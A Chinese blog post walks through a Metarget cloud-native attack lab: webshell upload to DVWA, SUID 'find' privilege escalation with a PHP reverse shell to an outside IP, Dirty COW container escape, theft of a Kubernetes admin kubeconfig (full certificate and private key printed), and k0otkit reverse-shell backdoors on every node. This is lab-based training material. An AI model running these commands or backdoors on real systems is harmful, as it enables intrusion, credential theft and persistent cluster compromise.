云原生攻防靶场-Metarget

Metarget目前仅支持在Ubuntu 16.04和18.04安装运行,在20.04上可能会遇到依赖项问题。安装步骤十分简单。
这里使用Ubuntu 18.04为例进行安装:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt

然后执行以下命令,为系统安装带有CVE-2019-5736容器逃逸漏洞的Docker:

sudo ./metarget cnv install cve-2019-5736

接着执行以下命令,为系统安装带有CVE-2018-1002105权限提升漏洞的Kubernetes:

sudo ./metarget cnv install cve-2018-1002105 --domestic

集群部署成功后,最后执行以下命令,在当前集群上部署一个容器化DVWA:

sudo ./metarget appv install dvwa --external

整个交互过程如下:

ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2019-5736
cve-2019-5736 is going to be installed
uninstalling current docker gadgets if applicable
installing prerequisites
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
installing docker-ce with 18.03.1~ce~3-0~ubuntu version

cve-2019-5736 successfully installed
ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2018-1002105 --domestic
docker already installed
cve-2018-1002105 is going to be installed
uninstalling current kubernetes if applicable
pre-configuring
pre-installing
adding apt repository deb https://mirrors.aliyun.com/kubernetes/apt/ kubernetes-xenial main
installing kubernetes-cni with 0.7.5-00 version
installing kubectl with 1.11.10-00 version
installing kubelet with 1.11.10-00 version
installing kubeadm with 1.11.10-00 version
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-proxy-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-controller-manager-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-apiserver-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-scheduler-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/pause:3.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/etcd-amd64:3.2.18
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/coredns:1.1.3
running kubeadm
installing cni plugin
installing flannel
pulling quay.mirrors.ustc.edu.cn/coreos/flannel:v0.10.0-amd64
generating kubernetes worker script
kubernetes worker script generated at tools/install_k8s_worker.sh
cve-2018-1002105 successfully installed
ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget appv install dvwa --external
docker already installed
kubernetes already installed
dvwa is going to be installed
node port 30000 is allocated for service in vulns_app/dvwa/dvwa/dvwa-service.yaml
applying yamls/k8s_metarget_namespace.yaml
applying vulns_app/dvwa/dvwa/dvwa-deployment.yaml
applying data/dvwa-service.yaml
dvwa successfully installed

根据命令行输出的内容,我们可以直接在浏览器中访问到容器内的DVWA服务:

可以看到,只需要三行命令,我们就完成了一个多层次靶机环境的构建。
环境的清理也十分简单,只需依次执行以下命令即可:

./metarget appv remove dvwa
./metarget cnv remove cve-2018-1002105
./metarget cnv remove cve-2019-5736

参考:http://blog.nsfocus.net/metarget/
https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw

使用admin/password登陆dvwa,直接使用文件上传来获取webshell。

上传冰蝎的shell连接获得webshell,可以看到当前权限为www-data权限。

接下来进行提权操作。

脏牛提权:Linux内核> = 2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。
查看发行版本
cat /etc/issue
cat /etc/*-release
查看内核版本信息
uname -a
SUID配置错误提权:
以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

这里我为了方便测试给环境中的find加了suid权限

通过命令查找设置了suid权限的可执行程序:

find / -perm -u=s -type f 2>/dev/null

find的-exec参数可以用来执行任意命令。因此我们可以使用添加了suid标识的find可执行程序以root身份执行命令来提权。我们尝试使用find来执行whomai命令。

find xxx -exec whoami \;

接着我们可以使用find来执行反弹shell命令,

find shell.php -exec php -r '$sock=fsockopen("42.xxx.xxx.97",8000);exec("/bin/sh -i <&3 >&3 2>&3");' \;

这里使用冰蝎执行反弹shell命令总是显示操作失败。


于是上传weevely的webshell,在weevely命令行中执行反弹shell成功了。

提权成功,获得了root权限的shell,但是这个shell并不是一个完全的root shell,它是一个euid为root,uid依旧是www-data的shell,也就是说我们只是获得了一个暂时的root shell。

容器探测:
测试过程中发现当前环境一些命令是没有,猜测当前环境可能是一个容器,通过查找.dockerenv文件和查看cgroup来判断当前我们是否在容器中。通过命令回显(kubepods)猜测我们当前处在在一个k8s的pod中。

ls -la / | grep dockerenv
cat /proc/1/cgroup

k8s、pod、容器之间的大概关系可以简单理解为:集群中包含多个pod,pod中包含多个容器。

容器逃逸:

CVE-2016-5195脏牛漏洞:
sudo apt install -y make gcc nasm
git clone https://github.com/scumjr/dirtycow-vdso
cd dirtycow-vdso
make

运行./0xdeadbeef attacker-ip:port
将获得宿主机的反弹shell,这里直接省略过程了,环境太卡老奔。
使用宿主机反弹回来的shell窃取Kubernetes管理员的访问凭据:

ls -al /root | grep kube
cat /root/.kube/config
# ls -al /root | grep kube
drwxr-xr-x  4 root   root   4096 Oct 31 20:26 .kube
# cat /root/.kube/config
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUN5RENDQWJDZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeE1UQXpNVEV5TWpZd01Wb1hEVE14TVRBeU9URXlNall3TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTGdtCm12UlcwMWpHK2FFOEVwZU5TUTZWQmxFV3p2dmR3YllWK2MrQ0laNmJEMk9DSkY2MnFLeEdTMUMrV1lDWFdYanQKeGZwYXZ2amVmZitNb1FuU2g5R0dXZ1dTQm9pUmFTdnlJazJYTVFqcUo5YnJwTVBPRDY0MTY4cEhMTTRtWE9pagozZ0plL0pOV1VkOFVhK0dYOWhNODVWeFdPSFF1V3lQR3hlVlg0cnMrU3UyOUpKcHhGdWswNG5uTGFUMklqV05RCkl0UElLTjcxSGpEcUQ1NmMrTjdVQlU3ZExLakw3SlhlUXIwUXoxZndraWllM1BzSEdybVhsQktGQWZ4Z1RKbDMKUlEyZ3lmdXVkbE1yN2dkMVRjT3M0bHVoNXFMS2ZOa1JXenV3RkRkamRPVWFsb1MzN0V4VWZ4d0lMN013ZGt6RApaR0ZiVHo2cGhhWHhPRENtcVQ4Q0F3RUFBYU1qTUNFd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFGeSt6a1I5bDlWRXN4UERJMDlmMFhXOWZFMXAKVUQ1Y3NRd2FOVCthSEVkYlBVcXZ5b0l3c21YcWF6Z0Zud1ZneVNwZHpLOG1zd0NJa3JsV1hOdEtzRHFhOTA0UwpTWjVyelAwM213bysyNUxkM2dyd2Jla3FQQkIvdmFqUk5KWjUzQWZybTQ3Zm5hQ3BGcUwxc0ZpcUk1K0pVTzk1CjM4eVlnalI2Tm54UVVoMlh5UDVDWkVFNVVabFgrV3lwZVVQZkEvSzUrTGpzRWI2cy9MaGJCUFFVMmtBaGtRVjAKYnhZaTlzQk5pVDdvV3U4MzRCUVBHeTFtVnBZQTF5NHRmd1Fod1lrV0NTd0lsaDZnZ1hYVkkvRW82bkpjNTNnZwpReHpKNG15ZmhQdVRrN3RoY3J5SXFMQXVhZjdkZ1JMVUw5aHV5c1VwNmkzR2dzTUNCalJVOEovQnJLST0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
    server: https://10.0.8.10:6443
  name: kubernetes
contexts:
- context:
    cluster: kubernetes
    user: kubernetes-admin
  name: kubernetes-admin@kubernetes
current-context: kubernetes-admin@kubernetes
kind: Config
preferences: {}
users:
- name: kubernetes-admin
  user:
    client-certificate-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUM4akNDQWRxZ0F3SUJBZ0lJYUF4bHVNNjFpUXN3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TVRFd016RXhNakkyTURGYUZ3MHlNakV3TXpFeE1qSTJNRFZhTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTIwQ1ZaOHBVY1I3Y3ZTTkkKMzh6dEwrUVNYLzdQSWo5aWdWUFpLN2hKYzdxNlQ5aFBkQS9zODlZb3VUUmlnWFpUQVFSU3BTM3h5TzZNaGR0NAp5cDh4eFlzUzlIbStldnk4Szd0YW4yMUFHN1ZDQVdrMWNvdU5rZGdYUTVBRTJMWHVURUJzc2tLQWVxOVlyQ25nCm8ySVZCZ0U1RzlRNm9oUnlLaU1sOG80T1JScko4ZURISTcra05iV3FKYytSMmJrN3NOWXNsSGpZc0hKR1ZJQ2sKNmNtZElDTUt0aXBtcURZMzVhRldrRE1WdUlTVUd6NTNiVmJYc2xQMkkxcEpjQm1HWERFM28yMWlzNjNjYmJ2ZApuNW5nbE15YXVUa3EzR251ZGdUc0NnR2puTmZZMTVLNGxuZGU3WDN2Z21lYW14eGVxSWhMYkpOTXgwa2poN0JsCkNzVmJEd0lEQVFBQm95Y3dKVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFIYkxQQzRNTnZUWjFJRG4xbXdJTWNVV3BiSjlaU3ZRT29GSQpxYmRTMk43UDFvQnJjcEkxOUtBdVZndHpLVkJmV3JaT1BrRW4xRDdERFRkdWJTbngrdiswcXRqeStMUDdUQ094Ck5aN0J6U0RYclVqRHJUTEc5bk1yUWRUM0ZvZ1NkU09QenV3bC9vRlBvTWVyVkIyTndlR3hEUEVsclVkcXduMzgKOUdFc2p5MnZuc3RROVIrSGs0aldaQ1BZN01zaUdsQUN4TGxrZWYrV2VoQ2hNMHJrKzBoSURlTjNvOGhseU1QWApBMHh5aVJFb3drS2txMU1rUTU2SVllMnVsUElPdFg5Y1NFeUdnbDgvV0ZpdUlGMDA4Z000THMzOCs0T3FjQnNkCmx6K2VZcDl0dWlYZ1ZOSkpUb2hndWRTRUVjdW8vVFlLcU1jU1c0REFiWEp3M1VKbURERT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
    client-key-data: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcFFJQkFBS0NBUUVBMjBDVlo4cFVjUjdjdlNOSTM4enRMK1FTWC83UElqOWlnVlBaSzdoSmM3cTZUOWhQCmRBL3M4OVlvdVRSaWdYWlRBUVJTcFMzeHlPNk1oZHQ0eXA4eHhZc1M5SG0rZXZ5OEs3dGFuMjFBRzdWQ0FXazEKY291TmtkZ1hRNUFFMkxYdVRFQnNza0tBZXE5WXJDbmdvMklWQmdFNUc5UTZvaFJ5S2lNbDhvNE9SUnJKOGVESApJNytrTmJXcUpjK1IyYms3c05Zc2xIallzSEpHVklDazZjbWRJQ01LdGlwbXFEWTM1YUZXa0RNVnVJU1VHejUzCmJWYlhzbFAySTFwSmNCbUdYREUzbzIxaXM2M2NiYnZkbjVuZ2xNeWF1VGtxM0dudWRnVHNDZ0dqbk5mWTE1SzQKbG5kZTdYM3ZnbWVhbXh4ZXFJaExiSk5NeDBramg3QmxDc1ZiRHdJREFRQUJBb0lCQVFDMnFOU1A5cEZvK0tRLwo4cEI0MnhwVGhyZ0VQNTNEVTNrMmMydC9ML1lKczJ3YXJ3UnFsZ1g3a3RTMGp6N3R5bTBXY01xRmtJUlp1TnRiCmZWL2h0c1RaWmFieUJDYzhBU2luYWx2eWJDczNxa2VHTTJkeXVXN0ZMWGtjTVhUSU1yR0gxemgzUGs0Wlo5SUIKQkphQXAyc0thS1J5V2RwTFE2dGxEWWxFelRKNFFIQkRxOHNhUlNKSDlEWTVYMlFybGdnTldOS3FyZU45Q2wzeQo1ZGtyY0ZBVEl0Tjg0SVdiUVpCOEMrbktzZjlxMGdtWmVSSE5TaWxRUG1KVkhxZ0NqSkQ3YUFUWlQvUFRpSURnCi9IU240UVJXU3NITWRwTHozYThLMG1KVUNoeWhuVTVsN0NSdndoeVJPdlJEeE1yV25rRWVuMjBtREFOWUJ0eTEKdWMrdjBsRGhBb0dCQU50RGFqbk5Ba3VFeTNOQ2RPY05iZGhVV3dTcmxJa3JDZElhdkR0cU1PMi9KejdPNkRRegppNGswUkNydytJaUEwaHcwUWcwRnVyRk5BRHFDdjlqWi9LQkt1d3VRdXVIK1FULzlqSng2cy9sWHRualJBTmJ4CmN0TFFLMU5YbWhTODVxQlVadUdGT0w2MjM5c3Q4OWpNcitGeHhRZzFPdXFsQ3VBeFVzOElZcnZ4QW9HQkFQLzgKc2IwdjROb0Q1ZitYVm12Y2Zqd0MrN0ZVVW5aU0daU0tCVDlmbnlobHhxTXU0UDlZVEpKSDdBSTJoQ3M2aUJ6egozT0RCaDlYb083RHJyZVc4OEFRRDZBOXJMSytOTUUva2RFUFBlY0cybUM3dm9aUVhKaHpxaDB5V1lmSitLZTBiCmJqaXlVc3BnbytDR2dRMHJ5M09DUWhScE80cUc2TWVDaWxRZXpJYi9Bb0dCQUp2eGw1UmlkWFptalJoOXRJMDgKSk5yT0xDbm5LbTVnV016QXpRMW8ya0hOU1VsSGVTamZYQ2VLTDgxbXN5ektpaVViR2JzUFR4ZVl6MGZPQkVwagp4MlB0b3BoNEtDSmhaZUR3SU5pT0FJQ2ZYSjBTOFFqdWtwN1RCVzF5Q1pra1BOYmRFSXJtNkZQajF0U1pHeXdmCmNCdmtnYUR6MHVKZDNaMVVGelErSDVMUkFvR0JBS2F3TWtEQ0U0V0RjbG9iZnIvZnBTZUl2Y0k3NlRKNHhZVnUKMW5uczF5T2tHbE9hTEJLNXVhcXJRS2cwUFo0MGovdGlaRnJLU3B4a2k3SHAxYU82Z3dQcVUwcnUrL3NZVWZSRQpDOTA0RmMycEM3SE1nb2QvQjJkZTVGbGZ0MG9ERTJQOUw2bWxuTG1CY2xTNjRQL2xtNmFNbEdEY0lWUlVBdklmCk05b1E4QmViQW9HQVA4UTNxakNUY3R6aStDRWdOWkIxUUVFblA2ZjdvVVlBYllJSzluc24vSWhJUE8wSEloUWIKTVk2K01BVGJOTWo1eU8zK3N6UUVpaklCdmFVVE9nd1luZUg0NEYxUXlaZmFWbU1DOVFLMFhoSUhUZ0pwdjJMcwo5aGM0VlVLaTN3eVhUaDhxRkkrYjFpV0trb2h1YkloWkhta3BFOURlMnVETXBxMEl4cTA5Q2hBPQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

将以上凭据保存在本地kubeconfig文件,然后尝试用凭据 连接并查看Kubernetes集群:

kubectl --kubeconfig ./kubeconfig get nodes
kubectl --kubeconfig ./kubeconfig get pods

控制集群+权限维持:
k0otkit允许我们在取得集群Master节点控制权限后,快速在集群所有节点上创建隐蔽、持久的反弹shell后⻔。克隆Github仓库到攻击者自己的Linux服务器(k0otkit依赖于Metasploit,服务器上需要存在msfvenom和 msfconsole两个工具),修改攻击者IP,然后执行pre_exp.sh:

git clone https://github.com/brant-ruan/k0otkit cd k0otkit
chmod u+x ./*.sh
# 修改pre_exp.sh中的ATTACKER_IP变量为实际攻击者IP 
./pre_exp.sh


脚本执行完成后,目录下新产生了一个k0otkit.sh文件,后面会用到。 接下来,执行handle_multi_reverse_shell.sh脚本,该脚本将打开msfconsole并运行一个反弹shell监听模块:

┌──(root💀kali)-[~/k0otkit-main]
└─# ./handle_multi_reverse_shell.sh
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444 
msf6 exploit(multi/handler) > 

然后复制k0otkit.sh文件内容到容器逃逸后的root shell中运行,攻击者的机器会收到传回来的session:

k0otkit在每个节点上创建了一个特权Pod,该Pod与节点共享Net和PID命名空间,并且在容器内的/var/kube-proxy-cache路径挂载了宿主机的根目录,上面msfconsole收到的正是由这些特权Pod反弹回来的shell。借助这些经过去隔离的特权Pod,我们可以很方便地控制集群。

posted @ 2021-10-31 12:54  micr067  阅读(3271)  评论(0编辑  收藏  举报